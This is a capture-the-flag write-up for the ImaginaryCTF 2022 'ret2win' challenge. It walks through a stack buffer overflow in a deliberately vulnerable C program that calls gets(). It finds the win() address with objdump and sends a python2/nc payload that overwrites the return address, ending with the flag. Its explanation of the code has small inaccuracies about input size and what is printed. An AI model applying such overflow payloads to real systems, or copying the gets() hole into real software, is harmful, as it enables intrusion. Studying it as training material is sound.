# Solution for ImaginaryCTF 2022 ret2win

### by @int0x33 MLH

```
#include <stdio.h>
#include <stdlib.h>

int win() {
  FILE *fp;
  char flag[255];
  fp = fopen("flag.txt", "r");
  fgets(flag, 255, fp);
  puts(flag);
}

char **return_address;

int main() {
  char buf[16];
  return_address = buf+24;

  setvbuf(stdout,NULL,2,0);
  setvbuf(stdin,NULL,2,0);

  puts("Welcome to ret2win!");
  puts("Right now I'm going to read in input.");
  puts("Can you overwrite the return address?");

  gets(buf);

  printf("Returning to %p...\n", *return_address);
}
```

**Here's what the above C code is doing:**
1. It defines a function called win() that prints the flag.
2. It defines a global variable called return_address that points to the address of buf+24.
3. It defines a function called main() that reads in 16 bytes of input into buf.
4. It prints out the address of buf+24.

So, if we can overwrite the return address with the address of win(), we can get the flag.

Let's see how we can do that.

First, we need to know the address of win().

```
objdump -d ret2win | grep win
ret2win:     file format elf64-x86-64
00000000004011d6 <win>:
```

Now we have the address we need to jump to, and we know the buffer offeset (buf+24) we can pwn! One last thing, we have to change endianess of address so we just reverse it.

the return address we need for **win** is `00000000004011d6`

which is represented like this `\x00\x00\x00\x00\x00\x40\x11\xd6`

we need to flip the endianess, so the above, when reversed, becomes 
`\xd6\x11\x40\x00\x00\x00\x00\x00`
                                      
`$ python2 -c "print 'A'*24 + '\xd6\x11\x40\x00\x00\x00\x00\x00'" | nc ret2win.chal.imaginaryctf.org 1337`

flag
`ictf{c0ngrats_on_pwn_number_1_9b1e2f30}`
